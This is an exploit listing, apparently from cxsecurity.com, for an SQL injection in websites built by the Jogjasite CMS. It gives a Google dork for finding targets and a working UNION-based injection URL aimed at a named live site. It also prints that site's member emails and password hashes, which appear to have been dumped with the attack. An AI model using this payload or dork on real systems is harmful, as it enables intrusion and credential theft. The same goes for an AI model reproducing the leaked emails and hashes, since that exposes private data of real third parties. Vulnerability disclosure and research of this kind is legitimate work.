Custom CMS Jogjasite - SQL-Injection Vulnerability

2021.02.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################# # Exploit Title: Custom CMS Jogjasite - SQL-Injection Vulnerability # Exploit Author: Gh05t666nero # Author Team: IndoGhostSec # Google Dork: intext:"By jogjasite.com" # Software Vendor: jogjasite.com # Software Version: * # Software Link: N/A # Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux # Date: 2021-02-05 ############################################################# [*] Information: ════════════════ Jogjasite is a custom website creation service, namely web design services and web programming services according to your wishes and needs. But, they program the site so unsatisfactory that it leaves some vulnerabilities. ############################################################# [*] Exploit: ════════════ - ############################################################# [*] Demo: ═════════ https://sonjucomputerjogja.com/kategori-12'+AND+0+UNION+SELECT+1,2,3,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(memberarea)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,email,0x203a3a20,password,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+--accessories wen_2111@yahoo.com :: 5a06cc059b39d1b3508efe00d044db05 mailinfo@newmedicforum.com :: ca5c40c1e33d5309ab72ff31278a330a info@newmedicforum.com :: fb882e63aef3468637787d2ed310602f email@newmedicforum.com :: ff332ac34eb7fc59519013e9d2b7474f agussribanowo@gmail.com :: 8f4f3b665a576448fc9ce34a34c916af apigflexter@gmail.com :: 346f67beda8b6aaf5bceeeffe5fab5c1 ############################################################# [*] Contact: ════════════ # Instagram: instagram.com/ojan_.py # Telegram : t.me/Gh05t666nero # Twitter: twitter.com/Gh05t666nero1 # Blogger: anonsec.my.id # E-mail : anoncentraI@protonmail.com


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top